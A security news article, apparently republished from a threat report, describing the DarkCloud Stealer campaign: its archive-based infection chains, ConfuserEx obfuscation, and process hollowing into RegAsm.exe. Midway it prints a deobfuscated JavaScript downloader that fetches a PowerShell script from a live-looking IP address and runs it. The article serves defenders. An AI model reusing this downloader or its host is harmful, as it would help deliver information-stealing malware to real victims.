DarkCloud Stealer Employs New Infection Chain and ConfuserEx-Based Obfuscation
A sophisticated information-stealing malware campaign has emerged, utilizing advanced obfuscation techniques and multiple infection vectors to evade traditional security controls.
The DarkCloud Stealer, first documented in recent threat intelligence reports, represents a significant evolution in cybercriminal tactics, employing a complex multi-stage delivery mechanism that begins with seemingly innocuous archive files and culminates in the deployment of a heavily obfuscated Visual Basic 6 payload.
The malware operators have developed three distinct infection pathways, each designed to maximize the likelihood of successful system compromise.
These include JavaScript-initiated chains that download PowerShell scripts, 7Z archives containing Windows Script Files with obfuscated JScript code, and TAR archives that serve as alternative entry points.
Each vector demonstrates sophisticated social engineering, often masquerading as legitimate business documents or software updates to bypass user suspicion.
Recent campaigns observed since April 2025 indicate the threat actors have significantly refined their approach, moving away from previously documented AutoIt-based implementations toward more complex .NET-based obfuscation frameworks.
Palo Alto Networks researchers identified this shift as part of a broader trend among cybercriminals to adopt enterprise-grade development tools for malicious purposes, making detection and analysis considerably more challenging for security teams.
The malware’s impact extends beyond traditional data theft, incorporating advanced persistence mechanisms and anti-analysis features that allow it to operate undetected for extended periods.
The campaign’s infrastructure, including command-and-control servers hosting multiple malicious PowerShell scripts, suggests a well-resourced operation with significant planning and development investment.
ConfuserEx Obfuscation and Process Injection Mechanics
The technical sophistication of DarkCloud Stealer becomes apparent in its implementation of ConfuserEx-based obfuscation, a legitimate .NET application protector repurposed for malicious use.
.webp "DarkCloud Stealer Employs New Infection Chain and ConfuserEx-Based Obfuscation 3")
The malware employs multiple layers of protection including anti-tampering measures, symbol renaming, and control flow obfuscation that transforms readable code into incomprehensible instruction sequences.
The deobfuscated JavaScript downloader reveals the initial infection mechanism:-
var rDFG = "C:\Temp\" + RandomName() + ".ps1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var shell = new ActiveXObject("WScript.Shell");
var http = new ActiveXObject('MSXML2.XMLHTTP');
if (Dwnld("http://176.65.142.190/Blackyy/kay.ps1", rDFG)) {
ExePSh(rDFG);
}This script downloads PowerShell payloads from open directory servers, creating randomly named files in the system’s temporary directory.
The subsequent PowerShell script contains Base64-encoded and AES-encrypted data that, when decrypted, reveals another executable protected by ConfuserEx’s anti-tampering features.
The final stage employs process hollowing, injecting the decrypted VB6 payload named “holographies.exe” into RegAsm.exe, a legitimate .NET Framework utility.
This technique allows the malware to execute within the context of a trusted process, effectively bypassing many endpoint security solutions.
Critical strings within the payload utilize RC4 stream cipher encryption with unique keys, further complicating static analysis efforts and demonstrating the authors’ commitment to evasion.
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
Source link
